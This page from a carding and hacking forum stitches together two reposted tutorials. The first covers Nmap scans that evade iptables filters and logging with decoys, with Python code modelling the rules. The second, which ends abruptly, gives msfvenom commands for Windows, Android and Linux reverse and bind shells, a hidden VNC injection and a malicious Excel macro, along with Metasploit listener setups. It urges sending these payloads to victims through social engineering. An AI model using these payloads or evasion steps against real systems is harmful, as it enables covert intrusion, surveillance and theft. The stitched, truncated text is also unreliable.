Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc

[Guide] Understanding Guide to Nmap Firewall Scan (Part 1)
Several times you might have used Nmap to perform network scanning and enumerate the active port services of a target machine, but in some scenarios it is not possible to scan with the basic scan method, especially when a firewall filter is in place.
Today we are going to demonstrate an "Nmap firewall scan" by making use of iptables rules, and try to bypass the firewall filter with Nmap's advanced scanning options.
Let’s Begin!!
Attacker’s IP: 192.168.0.107 [kali linux]
Target’s IP: 192.168.0.101 [Ubuntu]
Analysis of TCP Scan
Open the terminal in your Kali Linux and execute the following command to perform a TCP [sT] scan for open port enumeration.
nmap -sT -p22 192.168.1.101

From the given image you can observe that we scanned port 22, and the result shows port 22 as open for the SSH service.
[Image: 1.png?w=687&ssl=1]
When you use Wireshark to capture the packets sent during a TCP scan of the network, you need to notice a few things, such as the flags, the total length and the time to live [TTL] (in layer 3).
The following table lists the flags, data length and TTL for the different scanning methods:
Scan Name     | Flags                                | Data Length | TTL
-sT (TCP)     | SYN →, ← SYN,ACK, ACK →, RST,ACK →   | 60          | 64
-sS (Stealth) | SYN →, ← SYN,ACK, RST →              | 44          | <64 (less than 64)
-sF (Finish)  | FIN →                                | 40          | <64 (less than 64)
-sN (Null)    | NULL →                               | 40          | <64 (less than 64)
-sX (Xmas)    | FIN,PSH,URG →                        | 40          | <64 (less than 64)
The following Wireshark image shows the network traffic generated while the nmap TCP scan is running; here the first stream is the SYN packet, which contains the following information:
Total Length: 60 [data length excluding the 14 bytes of Ethernet header]
Time to live: 64 [the maximum TTL a Linux system uses in TCP communication]
[Image: 2.png?w=687&ssl=1]
Reject SYN Flag with IPTables
As we know, there is a constant fight between security researchers and attackers; to increase network security, the admin applies a firewall filter that prevents the 3-way handshake in the network and stops the attacker from performing a TCP scan by rejecting SYN packets.
Execute the command given below in Ubuntu to block SYN packets:
iptables -I INPUT -p tcp --tcp-flags ALL SYN -j REJECT --reject-with tcp-reset

Iptables works as the firewall in the Linux operating system, and the above iptables rule rejects SYN packets to prevent a TCP scan.
[Image: 3.png?w=687&ssl=1]
Now that SYN packets are rejected by the firewall in the target network, the attacker is unable to enumerate open ports of the target even if services are active.
When we [the attacker] execute the TCP scan again, it reports port 22 as closed, as shown in the given image.
[Image: 4.png?w=687&ssl=1]
Bypass SYN Filter
When the attacker fails to enumerate open ports using a TCP scan, there are some advanced scanning methods that can bypass this type of firewall filter, as given below:
FIN Scan
A FIN packet is used to terminate the TCP connection between the source and destination port, typically after the data transfer is complete. In place of the SYN packet, Nmap starts a FIN scan by sending a FIN packet.
A FIN scan only works against Linux machines and does not work on the latest versions of Windows.
nmap -sF -p22 192.168.0.101

From the given image you can observe the result that port 22 is open.
[Image: 5.png?w=687&ssl=1]
When you capture the network traffic for the FIN packet, you can verify that the data length is 40 and the TTL is always less than 64; moreover, no SYN packet is used to establish TCP communication with the target machine.
[Image: 6.png?w=687&ssl=1]
NULL Scan
A Null scan is a series of TCP packets whose flag field is all zeros (000000); since no flags are set, the destination does not know how to reply to the request. It discards the packet and sends no reply, which indicates that the port is open.
A Null scan only works against Linux machines and does not work on the latest versions of Windows.
nmap -sN -p22 192.168.0.101

From the given image you can observe the result that port 22 is open.
[Image: 7.png?w=687&ssl=1]
Similarly, when you capture the network traffic for the NULL packet, you can verify that the data length is 40 and the TTL is always less than 64; here too no SYN packet is used to establish TCP communication with the target machine.
[Image: 8.png?w=687&ssl=1]
XMAS Scan
This scan manipulates the PSH, URG and FIN flags of the TCP header: it sets the FIN, PSH and URG flags, lighting the packet up like a Christmas tree. When the source sends a FIN, PSH, URG packet to a specific port and the port is open, the destination discards the packet and does not send any reply to the source.
An Xmas scan only works against Linux machines and does not work on the latest versions of Windows.
nmap -sX -p22 192.168.0.101

From the given image you can observe the result that port 22 is open.
[Image: 9.png?w=687&ssl=1]
Similarly, when you capture the network traffic for the Xmas scan you will see the combination of FIN, PSH and URG flags; here too you can verify that the data length is 40 and the TTL is always less than 64.
Conclusion: a TCP connection is established by the 3-way handshake, and if the firewall discards the 3-way handshake to prevent TCP communication, then FIN, NULL and XMAS scans are used instead.
[Image: 10.png?w=687&ssl=1]
Reject FIN Packet Using IPTABLES Rule
Again the admin adds a new firewall filter to prevent network enumeration by FIN scan, which rejects FIN packets in the network.
Execute the command given below in Ubuntu to block FIN packets:
iptables -I INPUT -p tcp --tcp-flags ALL FIN -j REJECT --reject-with tcp-reset

[Image: 11.png?w=687&ssl=1]
Now when the attacker tries to perform an advanced scan using the FIN scan, he is not able to enumerate open port information, which you can confirm from the image given below.
[Image: 12.png?w=687&ssl=1]
At this point only the Null and Xmas scans will help to perform port enumeration, until the admin also blocks the traffic of these scans. From the image given below you can confirm that port 22 shows as closed when the FIN scan is performed, while it shows as open when the Null and Xmas scans are performed.
To protect your network from NULL and Xmas scans too, apply the iptables rules given below for Null and Xmas respectively:
iptables -I INPUT -p tcp --tcp-flags ALL NONE -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp --tcp-flags ALL FIN,PSH,URG -j REJECT --reject-with tcp-reset

[Image: 13.png?w=687&ssl=1]
Reject Data-length with IPTables
As discussed above, TCP communication is characterised by 3 factors: the "Flags", which I demonstrated above, the "TTL", which I will demonstrate later, and the "Data length", which I am going to demonstrate now.
So when the admin wants to secure his network from a TCP scan again, instead of applying a firewall filter on TCP flags he can also apply a firewall rule that checks for a "data length" of a specific size and then stops the incoming network traffic for the TCP connection. Execute the command given below to apply a firewall rule on "data length"; by default 60 is the data length used by the TCP scan, which you can confirm from the table given above.
iptables -I INPUT -p tcp -m length --length 60 -j REJECT --reject-with tcp-reset

[Image: 17.png?w=687&ssl=1]
Now that packets with a data length of 60 bytes are blocked by the firewall in the target network, the attacker is unable to enumerate open ports of the target even if the service is active.
When we [the attacker] execute the TCP scan again, it reports port 22 as closed, as shown in the given image.
[Image: 18.png?w=687&ssl=1]
Bypass Data-Length Restriction with Stealth Scan
When the attacker fails to enumerate open ports using the TCP [sT] scan, there are some scanning methods that can bypass this type of firewall filter, as given below:
nmap -sS -p 22 192.168.0.101

From the image given below you can observe that port 22 is open when the stealth scan [sS] is executed; this is because the data length sent by the stealth scan is 44 by default for the TCP connection.
[Image: 19.png?w=687&ssl=1]
The stealth scan is quite similar to the TCP scan and is also known as "half open" scanning, because it sends a SYN packet, receives a SYN/ACK packet in response from a listening port and records the result without sending an ACK packet back to the listening port. Therefore, if the "SYN packet" is blocked by the firewall this scan fails; it only applies when data length = 60 or TTL = 64 is blocked by the firewall.
[Image: 20.png?w=687&ssl=1]
Fragment Scan
The -f option causes the requested scan to use tiny fragmented IP packets. The idea is to split up the TCP header over several packets to make it harder for packet filters, intrusion detection systems and other annoyances to detect what you are doing. So a 20-byte TCP header would be split into three packets, two with eight bytes of the TCP header and one with the final four.
nmap -f -p22 192.168.0.101

[Image: 21.png?w=687&ssl=1]
When you capture the network traffic, you can verify that the data length is 28, excluding the 14 bytes of Ethernet, and the TTL is always less than 64.
Similarly, you can use the FIN, Null and Xmas scans, whose data length is 40, to enumerate open ports of the target network.
[Image: 22.png?w=687&ssl=1]
If the admin applies firewall filters to reject data lengths 40, 44 and 60 by executing the following iptables rules, the attacker cannot perform any of the above scans, whether basic or advanced.
iptables -I INPUT -p tcp -m length --length 60 -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp -m length --length 44 -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp -m length --length 40 -j REJECT --reject-with tcp-reset

[Image: 23.png?w=687&ssl=1]
From the image given below you can observe that the FIN, Null, Xmas and stealth scans are now all unable to enumerate open ports of the target network. All of them show the port as closed even though the service is active.
[Image: 24.png?w=687&ssl=1]
Data Length Scan
When an attacker is unable to enumerate open ports with the above scans, he can go with the nmap "data-length scan", which bypasses the above firewall filter too.
By default each nmap scan has a fixed data length, as explained above; this option lets you append random data of a length of your choice.
With the following command the attacker tries to enumerate open ports by defining a data length of 12:
nmap --data-length 12 -p 22 192.168.0.101

Awesome!! From the image given below you can observe that port 22 is open.
[Image: 25.png?w=687&ssl=1]
When you use Wireshark to capture the network traffic generated while this scan is running, you will see that the "Total length" for TCP is 44.
The size of the SSH packet is 70 bytes; subtract the 14 bytes of Ethernet and 56 bytes remain; now subtract the 12 bytes of data length which you defined, and a total length of 44 bytes is left.
Here, 70 bytes - 14 bytes [Ethernet] = 56 bytes
Now, 56 bytes - 12 bytes [data-length] = 44 bytes
[Image: nmap.png?w=687&ssl=1]
Reject Length Size 1 to 100
If the admin is aware of the nmap data-length scan, he should block a complete range of data lengths to prevent network scanning by the attacker, by executing the following iptables rule.
iptables -I INPUT -p tcp -m length --length 1:100 -j REJECT --reject-with tcp-reset

Now the firewall analyses the traffic coming into its network, rejects packets whose data length is between 1 byte and 100 bytes, and refuses to establish TCP connections with the attacker.
[Image: 27.png?w=687&ssl=1]
Now if the attacker sends a data length between 1 byte and 100 bytes, the port scan fails to enumerate the open state; you can confirm this from the image given below, where port 22 is closed in both scans, with data lengths of 12 bytes and 10 bytes. As soon as the attacker sends a data length of 101 bytes, which is more than 100 bytes, port 22 shows as open.
[Image: 28.png?w=687&ssl=1]
TTL Scan
Reject TTL Size with IPTables
After applying firewall filters on "TCP flags" and "data length" to secure the network from enumeration, we now add a firewall filter for "Time To Live", i.e. TTL.
If you look at the table given at the beginning of the article, you will observe that only the TCP scan [sT] has a TTL value equal to 64, while the remaining scans always have a TTL value less than 64; hence if the admin applies a firewall filter to reject a TTL value of 64, it will prevent TCP scanning of the network.
The command given below adds a new firewall rule that checks for a TTL value of 64 and rejects the packet.
iptables -I INPUT -p tcp -m ttl --ttl 64 -j REJECT --reject-with tcp-reset

[Image: 29.png?w=687&ssl=1]
Now if the attacker uses the "TCP [sT] scan" to enumerate port information, it will always show "port is closed", whereas if another scan is performed the attacker gets accurate information about the port state. From the image given below you can observe that when the "basic scan" is executed to enumerate port details, it reports "port 22 is open".
[Image: 30.png?w=687&ssl=1]
This happens because the TTL value of the "basic scan" is less than 64, and the firewall of the target machine rejects only a TTL value equal to 64. When we captured the network traffic generated while this scan was running, we found that the basic scan used a TTL value of 56.
[Image: 31.png?w=687&ssl=1]
Now the admin adds one more layer of security to protect his network from every type of scan, by rejecting TTL values of 64 and less than 64.
iptables -I INPUT -p tcp -m ttl --ttl-lt 64 -j REJECT --reject-with tcp-reset

Now the firewall analyses the traffic coming into the network and blocks packets with a TTL of 64 or less.
[Image: 32.png?w=687&ssl=1]
Bravo!! The above firewall rule is more powerful than the previous rules, because it completely blocks the NMAP "basic scan" as well as the "advanced scans"; if you look at the image given below you will observe that the TCP [sT], FIN [sF], data-length and stealth [sS] scans have all failed and show the port as closed.
[Image: 33.png?w=687&ssl=1]
Still, there is a second way to enumerate the port for an accurate result: setting a TTL value greater than 64. The following command performs a port scan with a defined TTL value of 65, which bypasses the firewall filter because 65 is greater than 64.
nmap -p22 --ttl 65 192.168.0.101

So only if the attacker is lucky enough to guess the rejected TTL value or the firewall rule, and applies the correct TTL, does port enumeration succeed; as shown in the given image, port 22 is open.
[Image: 34.png?w=687&ssl=1]
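To see exactly which of the rules above catch which probe, here is an added example (my own code, not from the original post) that models the iptables --tcp-flags, -m length and -m ttl matches in Python and runs the first probe of each scan from the table through the rule sets in the order the guide adds them. The flag sets and IP lengths are taken from the guide's table and captures; the TTL values below 64 are constructed samples, since the guide only states they are "less than 64".

```python
"""Model of the iptables matches used in this guide (--tcp-flags, -m length,
-m ttl), evaluated against the first probe each Nmap scan sends.
Added example, not code from the original post. Flags and IP total lengths
come from the guide's table and captures; the TTL values below 64 are
constructed samples, since the guide only states they are "less than 64".
"""
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple

TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04,
             "PSH": 0x08, "ACK": 0x10, "URG": 0x20}


def flag_bits(names: str) -> int:
    """Turn an iptables flag list ('FIN,PSH,URG', 'ALL', 'NONE') into a bitmask."""
    if names == "NONE":
        return 0
    if names == "ALL":
        return sum(TCP_FLAGS.values())
    return sum(TCP_FLAGS[n] for n in names.split(","))


@dataclass(frozen=True)
class Probe:
    scan: str     # the nmap invocation from the guide
    flags: int    # TCP flags set in the probe
    ip_len: int   # IP total length, the value -m length compares
    ttl: int      # IP TTL, the value -m ttl compares


Rule = Tuple[str, Callable[[Probe], bool]]


def tcp_flags(mask: str, comp: str) -> Callable[[Probe], bool]:
    """--tcp-flags MASK COMP: of the bits in MASK, exactly those in COMP are set."""
    return lambda p: (p.flags & flag_bits(mask)) == flag_bits(comp)


def length(lo: int, hi: Optional[int] = None) -> Callable[[Probe], bool]:
    """-m length --length LO[:HI], an inclusive range on the IP total length."""
    return lambda p: lo <= p.ip_len <= (lo if hi is None else hi)


def ttl_eq(v: int) -> Callable[[Probe], bool]:
    return lambda p: p.ttl == v    # -m ttl --ttl v


def ttl_lt(v: int) -> Callable[[Probe], bool]:
    return lambda p: p.ttl < v     # -m ttl --ttl-lt v


PROBES = [
    Probe("nmap -sT", flag_bits("SYN"), 60, 64),   # built by the OS stack: TCP options, TTL 64
    Probe("nmap -sS", flag_bits("SYN"), 44, 56),   # raw SYN with only an MSS option
    Probe("nmap -sF", flag_bits("FIN"), 40, 49),
    Probe("nmap -sN", flag_bits("NONE"), 40, 51),
    Probe("nmap -sX", flag_bits("FIN,PSH,URG"), 40, 60),
    # -f: the first fragment carries 20 bytes of IP header and 8 bytes of TCP
    # header, the 28 bytes seen in the guide's capture. The flags are modelled
    # as if the header were whole; note that with connection tracking loaded the
    # kernel reassembles fragments before INPUT and sees the full length.
    Probe("nmap -f", flag_bits("SYN"), 28, 47),
    Probe("nmap --data-length 12", flag_bits("SYN"), 44 + 12, 53),
    Probe("nmap --data-length 101", flag_bits("SYN"), 44 + 101, 58),
    Probe("nmap --ttl 65", flag_bits("SYN"), 44, 65),
]

# The REJECT rules from the guide, grouped the way the guide introduces them.
FLAG_RULES: List[Rule] = [
    ("--tcp-flags ALL SYN", tcp_flags("ALL", "SYN")),
    ("--tcp-flags ALL FIN", tcp_flags("ALL", "FIN")),
    ("--tcp-flags ALL NONE", tcp_flags("ALL", "NONE")),
    ("--tcp-flags ALL FIN,PSH,URG", tcp_flags("ALL", "FIN,PSH,URG")),
]
LENGTH_RULES: List[Rule] = [(f"-m length --length {n}", length(n)) for n in (60, 44, 40)]
LENGTH_RANGE_RULE: List[Rule] = [("-m length --length 1:100", length(1, 100))]
TTL_RULES: List[Rule] = [("-m ttl --ttl 64", ttl_eq(64)), ("-m ttl --ttl-lt 64", ttl_lt(64))]


def first_match(probe: Probe, rules: List[Rule]) -> Optional[str]:
    """Name of the first rule that rejects the probe, or None if it gets through."""
    for name, pred in rules:
        if pred(probe):
            return name
    return None


def scans_getting_through(rules: List[Rule]) -> List[str]:
    """Scans whose probe is not rejected by any rule in the set."""
    return [p.scan for p in PROBES if first_match(p, rules) is None]


if __name__ == "__main__":
    stages = [("SYN rule only", FLAG_RULES[:1]), ("all flag rules", FLAG_RULES),
              ("length 40/44/60", LENGTH_RULES), ("length 1:100", LENGTH_RANGE_RULE),
              ("ttl 64 and <64", TTL_RULES)]
    for title, rules in stages:
        print(f"{title:16} lets through: {scans_getting_through(rules)}")
```

Note that -sT gets its 60-byte, TTL-64 SYN from the host's own TCP stack, so the length-60 and TTL rules also reject normal connection attempts from any Linux client on the same segment. They are useful for studying how a scanner is matched, not as a production firewall policy.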
Source Port Scan
Source Port Filter with IPTables
One more step to secure the network from scanning is to apply firewall rules that allow traffic from a specific source port only and reject traffic from all remaining ports.
iptables -I INPUT -p tcp --sport 80 -j ACCEPT
iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset

[Image: 35.png?w=687&ssl=1]
Now again the NMAP basic and advanced scans fail to enumerate the open port state, and only if the attacker again makes a correct guess about the firewall filter can he execute an NMAP source port scan to enumerate port details.
The option -g is used to define the source port which carries the network packets to the destination port.
nmap -g 80 192.168.0.101

The above command sends traffic from port 80 to perform the scan; hence the firewall allows the traffic from source port 80 and, as a result, shows the state of open ports.
[Image: 36.png?w=687&ssl=1]
Decoy Scan
Set Firewall Log to Capture Attacker IP
The admin can set a firewall rule to create a log of the IPs from which traffic is coming; it only creates system log entries, capturing the IP of the attacker who is performing the scan.
iptables -I INPUT -p tcp -j LOG --log-prefix "kaliNmap" --log-level=4

Now if the attacker performs any type of network scan on the targeted system, the firewall generates a log entry which captures his IP.
[Image: 37.png?w=687&ssl=1]
Escape from the Firewall Log
Always take some kind of precaution to protect yourself while performing network scanning, because on Windows a "honey pot" and on Linux "iptables" are firewalls that will log the attacker's IP. In such a situation you are advised to use a Decoy scan for port enumeration.
Decoy Scan
The -D option makes it look as though the decoys are scanning the target network. It does not hide your own IP, but it makes your IP one of a torrent of others supposedly scanning the victim at the same time. This not only makes the scan look scarier, but reduces the chance of you being traced from your scan (it is difficult to tell which system is the "real" source).
nmap -D 216.58.203.164 192.168.0.101

In the above command we used a Google IP as the decoy, which will appear as the attacker IP in the firewall log.
[Image: 38.png?w=687&ssl=1]
tail -f /var/log/syslog

When the admin reads the system log he will take the highlighted IP as the attacker's IP and may apply a filter on this IP to block incoming traffic from it.
[Image: 39.png?w=687&ssl=1]
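Added example (my own code, not part of the original post): a small Python parser for the LOG lines the kaliNmap rule writes to syslog, summarising probes per source address and grouping probes that several sources sent within the same second to the same destination port from the same source port, which is how a decoy scan shows up on the admin's side (a heuristic, assumed here, to verify against your own captures). The log lines embedded in the block are constructed to resemble kernel LOG output and are not a real capture.

```python
"""Parser for the iptables LOG entries written by the guide's rule
(iptables -I INPUT -p tcp -j LOG --log-prefix "kaliNmap" --log-level=4).
Added example, not from the original post. SAMPLE_LOG is constructed to
resemble syslog kernel LOG output; it is not a real capture.
"""
import re
from collections import defaultdict

# --log-prefix "kaliNmap" has no trailing space, so the prefix runs straight
# into the IN= field; the \s* below accepts both spellings.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ kernel: "
    r"(?:\[\s*[\d.]+\] )?kaliNmap\s*(?P<fields>IN=.*)$"
)
FLAG_TOKENS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}
MAC = "MAC=08:00:27:dd:ee:ff:08:00:27:aa:bb:cc:08:00"  # constructed

# Constructed sample: a -sT SYN, an Xmas probe, a NULL probe, then a decoy
# scan where two "sources" send the same SYN in the same second.
SAMPLE_LOG = f"""\
Mar  3 10:15:42 ubuntu kernel: [ 8123.456789] kaliNmapIN=enp0s3 OUT= {MAC} SRC=192.168.0.107 DST=192.168.0.101 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=3451 DF PROTO=TCP SPT=51234 DPT=22 WINDOW=29200 RES=0x00 SYN URGP=0
Mar  3 10:15:43 ubuntu kernel: [ 8124.001122] kaliNmapIN=enp0s3 OUT= {MAC} SRC=192.168.0.107 DST=192.168.0.101 LEN=40 TOS=0x00 PREC=0x00 TTL=49 ID=21007 PROTO=TCP SPT=44321 DPT=22 WINDOW=1024 RES=0x00 FIN PSH URG URGP=0
Mar  3 10:15:44 ubuntu kernel: [ 8125.300000] kaliNmapIN=enp0s3 OUT= {MAC} SRC=192.168.0.107 DST=192.168.0.101 LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=9876 PROTO=TCP SPT=44322 DPT=22 WINDOW=1024 RES=0x00 URGP=0
Mar  3 10:16:05 ubuntu kernel: [ 8146.100000] kaliNmapIN=enp0s3 OUT= {MAC} SRC=216.58.203.164 DST=192.168.0.101 LEN=44 TOS=0x00 PREC=0x00 TTL=41 ID=15 PROTO=TCP SPT=39001 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  3 10:16:05 ubuntu kernel: [ 8146.100200] kaliNmapIN=enp0s3 OUT= {MAC} SRC=192.168.0.107 DST=192.168.0.101 LEN=44 TOS=0x00 PREC=0x00 TTL=41 ID=7731 PROTO=TCP SPT=39001 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
"""


def parse_log_line(line: str):
    """Split one LOG line into its fields; returns None for lines without the prefix."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = {"ts": m.group("ts"), "flags": set()}
    for tok in m.group("fields").split():
        if tok in FLAG_TOKENS:
            rec["flags"].add(tok)       # bare tokens such as SYN, FIN, PSH
        elif "=" in tok:
            key, val = tok.split("=", 1)
            rec[key] = val              # KEY=VALUE fields such as SRC=, DPT=
    return rec


def classify(flags: set) -> str:
    """Map the TCP flags of a probe onto the scan names used in the guide."""
    if flags == {"SYN"}:
        return "SYN (-sT/-sS)"
    if flags == {"FIN"}:
        return "FIN (-sF)"
    if not flags:
        return "NULL (-sN)"
    if flags == {"FIN", "PSH", "URG"}:
        return "Xmas (-sX)"
    return "other"


def summarize(log_text: str):
    """Per-source probe counts plus groups of sources that look like one decoy scan."""
    per_src = defaultdict(lambda: {"probes": 0, "ports": set(), "scans": set()})
    clusters = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None or rec.get("PROTO") != "TCP":
            continue
        src = rec["SRC"]
        per_src[src]["probes"] += 1
        per_src[src]["ports"].add(int(rec["DPT"]))
        per_src[src]["scans"].add(classify(rec["flags"]))
        # Heuristic: the same probe (same destination and source port) from
        # several sources within one second is what -D decoys look like; the
        # log alone cannot tell which of those sources is the real one.
        clusters[(rec["ts"], rec["DST"], rec["DPT"], rec["SPT"])].add(src)
    decoy_groups = [sorted(s) for s in clusters.values() if len(s) > 1]
    return dict(per_src), decoy_groups


if __name__ == "__main__":
    sources, groups = summarize(SAMPLE_LOG)
    for src, info in sources.items():
        print(f"{src:16} probes={info['probes']} ports={sorted(info['ports'])} "
              f"scans={sorted(info['scans'])}")
    for g in groups:
        print("possible decoy scan, sources:", ", ".join(g))
```

A LOG rule on every TCP packet is noisy on a busy host, so in practice it is paired with -m limit; and since the decoy grouping is only a hint, blocking the first address seen in the log, as the guide's admin does, can block a decoy rather than the scanner.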

Hello friends!!
Today we will learn to create payloads with a popular tool known as Metasploit; we will explore the various options available within the tool to create payloads with different extensions and techniques.
Msfvenom
Msfvenom is a command line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit.
Requirements:
  • Kali Linux
  • Windows Machine
  • Android Phone
  • Linux Machine
Abbreviations:
Lhost= (IP of Kali)
Lport= (any port you wish to assign to the listener)
P= (Payload I.e. Windows, Android, PHP etc.)
F= file extension (i.e. windows=exe, android=apk etc.)
Let’s Begin!!
From the Kali terminal type the command msfvenom as shown below. It shows all the available options for creating a payload, but in this article we are talking about the different types of payload we can generate.
[Image: 1.png?w=687&ssl=1]
Bind shell
A bind shell is a kind of shell that opens up a new service on the target machine and requires the attacker to connect to it in order to get a session.
Now type the below command in your Kali terminal:
msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe

It will save the "exe" payload file on your desktop, as specified in the command (/root/Desktop/bind.exe). We need to send this file to the victim machine through a file share or by any social engineering technique and have it run on the system.
[Image: 2.png?w=687&ssl=1]
Now let us start msfconsole and type the commands below to get a session on the victim machine:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
msf exploit(handler) > set rhost 192.168.0.100
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

Once the file is executed on the machine we get the meterpreter session of the victim machine, as shown below.
The bind_tcp option is helpful in case we get disconnected from the victim machine while the payload is still running: we can execute the same commands and get the session back without the victim having to run the payload again.
[Image: 3.png?w=687&ssl=1]
Reverse TCP Payload
A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.
From the Kali terminal type the command msfvenom as shown below:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > /root/Desktop/reverse_tcp.exe

[Image: 4.png?w=687&ssl=1]
In this case we include a few other options, such as lhost (local host) and lport (local port), to get a reverse connection from the victim machine.
Once the payload is generated and sent to the victim for execution, we start our next step as shown below.
Now let us start msfconsole and type the commands below to get a session on the victim machine:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit

We can confirm from the image below that once the payload is executed by the victim, we receive a reverse connection and get the meterpreter session successfully.
[Image: 5.png?w=687&ssl=1]
HTTPS Payload
Note: both of the above payloads can be used when the relevant ports are open on the victim machine, so the question arises: what if the victim has blocked all the ports?
Well, in such cases we can create payloads for the ports that are in use on the victim machine, such as 443 for HTTPS.
Let us take this case and create a payload over HTTPS. From the Kali terminal type the command msfvenom as shown below:
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.107 lport=443 -f exe > /root/Desktop/443.exe

[Image: 6.png?w=687&ssl=1]
Once the payload is generated and sent to the victim for execution, we start our next step as shown below.
Now let us start msfconsole and type the commands below to get a session on the victim machine:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit

We can confirm from the image below that once the payload is executed by the victim, we receive a reverse connection and get the meterpreter session.
[Image: 7.png?w=687&ssl=1]
Hidden Bind TCP Payload
Let us now explore some other techniques available in the msfvenom tool and try to exploit the victim machine; this time we will get the shell of the victim machine instead of a meterpreter session.
Let's begin!!
This payload hides silently in the background while executed and does not reveal its presence if scanned by a port scanner.
From the Kali terminal type the command msfvenom as shown below:
msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=1010 -f exe > /root/Desktop/hidden.exe

[Image: 8.png?w=687&ssl=1]
Once the payload is generated and sent to the victim for execution, we start our next step as shown below.
We use Netcat to connect to the bind shell.
Now from the Kali terminal type the command as shown below:
nc 192.168.0.100 1010

[Image: 9.png?w=687&ssl=1]
Reverse Shell Payload with Netcat
Let us now follow the same process with the shell_reverse_tcp payload, one more technique to get a shell session on the victim.
From the Kali terminal type the command msfvenom as shown below:
msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.107 lport=1111 -f exe > /root/Desktop/ncshell.exe

[Image: 10.png?w=687&ssl=1]
Once the payload is generated and sent to the victim for execution, we start our next step as shown below.
We set up our listener using Netcat; the image below confirms the shell session captured by the Kali machine.
Now from the Kali terminal type the command as shown below.
nc -lvp 1111

[Image: 11.png?w=687&ssl=1]
Macro Payload
Let us now create a payload with a VBA script, which we will use to create a macro in Excel to exploit the victim machine.
Let us begin to create the payload!!
Open the Kali terminal and type the command mentioned below:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=7777 -f vba

[Image: 13.png?w=687&ssl=1]
Once the command is executed, copy the script starting from "#If VBA 7" up to "End If", as highlighted in the image below:
[Image: 14.png?w=687&ssl=1]
Let us now open an Excel file and press the Alt+F11 keys to open the VB script editor; you will get the options box shown above. Enter the name you would like to give and click on "Create".
[Image: 15.png?w=687&ssl=1]
You will get a new options box as above; click on "This workbook", replace the contents with your copied VB script payload generated by the msfvenom tool, close the VB script editor and enable the macro.
[Image: 16.png?w=687&ssl=1]
Now you may draft your Excel file with relevant data that looks realistic enough for a victim to open the file; in our case we have just inserted the value "Test". Save the file and send it to the victim.
To capture the session let us now start the multi handler as stated below:
Open the Kali terminal and type msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 7777
msf exploit(handler) > exploit

Once the Excel file is opened by the victim, it will prompt the victim to enable the macro; once enabled, our VBScript executes and provides us with a reverse connection to the victim machine, as shown in the image below.
[Image: 17.png?w=687&ssl=1]
VNC Payload
Wouldn't it be great if we could take remote control of the victim machine without their knowledge and observe their activity anonymously? This payload does exactly that; let us use it to our benefit.
Let us begin to create the payload!! Open the Kali terminal and type the command mentioned below:
msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.0.107 lport=5900 -f exe > /root/Desktop/vnc.exe

[Image: 18.png?w=687&ssl=1]
Once the payload is generated and sent to the victim for execution, we start our next step as shown below. To capture the session let us now start the multi handler as stated below:
Open the Kali terminal and type msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 5900
msf exploit(handler) > exploit

[Image: 19.png?w=687&ssl=1]
We can see that the reverse connection has executed the VNC injection and the victim's remote machine session is established on our Kali machine, showing the remote desktop.
[Image: 20.png?w=687&ssl=1]
Android Payload
Exploiting handheld devices has always been a hot topic and still continues to be, hence we have included it in our article as well; let us use one of the Android payloads available within the msfvenom tool to our benefit.
Let's begin
Open the Kali terminal and type the command mentioned below:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8888 > /root/Desktop/file.apk

[Image: 21.png?w=687&ssl=1]
Once the payload is generated, send it to the victim to execute on his handheld and start the multi handler as shown in the image below.
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 8888
msf exploit(handler) > exploit

Once the payload is executed, you get the meterpreter session of the handheld, which is now under your control, as shown below.
[Image: 22.png?w=687&ssl=1]
Linux Payload
Open Kali Terminal and type the command as mention below:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f elf > /root/Desktop/shell
1
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f elf > /root/Desktop/shell

[Image: 25.png?w=687&ssl=1]
Once the payload has been generated, send it to the victim to execute on their Linux machine and start the multi handler as shown in the image below.
msf > use exploit/multi/handler
